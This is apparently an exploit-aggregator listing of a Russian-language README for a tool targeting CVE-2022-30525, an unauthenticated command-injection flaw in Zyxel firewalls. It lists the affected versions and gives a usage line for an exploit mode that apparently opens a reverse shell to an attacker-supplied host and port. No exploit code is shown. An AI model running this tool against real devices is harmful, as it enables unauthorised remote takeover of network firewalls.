Sploitus

Exploit for CVE-2022-30525

kitploit · 2026-08-25

Exploit Code

MARKDOWN28 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-WEST9B-CVE-2022-30525
# CVE-2022-30525 Уязвимость внедрения команд в брандмауэре Zyxel

CVE-2022-30525 POC&EXP

author:160team.west9B

**Только для использования авторизованными исследователями безопасности, соблюдайте закон о кибербезопасности. Любые проблемы и последствия – на вашей ответственности, автор не несет ответственности.**

# 01-Основное введение

12 мая 2022 года компания Zyxel выпустила бюллетень безопасности, устраняющий уязвимость удаленного внедрения команд без аутентификации в своих брандмауэрах (CVE-2022-30525). CVSS-оценка этой уязвимости составляет 9,8. Уязвимость существует в программах CGI некоторых версий брандмауэров Zyxel, позволяя выполнять произвольные команды на затронутых устройствах без аутентификации.

Затронутые версии:

Серия ATP: 5.10-5.21 Patch 1

Серия VPN: 4.60-5.21 Patch 1

USG FLEX 100(W), 200, 500, 700: 5.00-5.21 Patch 1

USG FLEX 50(W)/USG20(W)-VPN: 5.10-5.21 Patch 1

# 02-Инструкция по использованию

## usage_poc: ./cve-2022-30525 -m poc -u url

## usage_exp: ./cve-2022-30525 -m exp -u url -lhost ip -lport port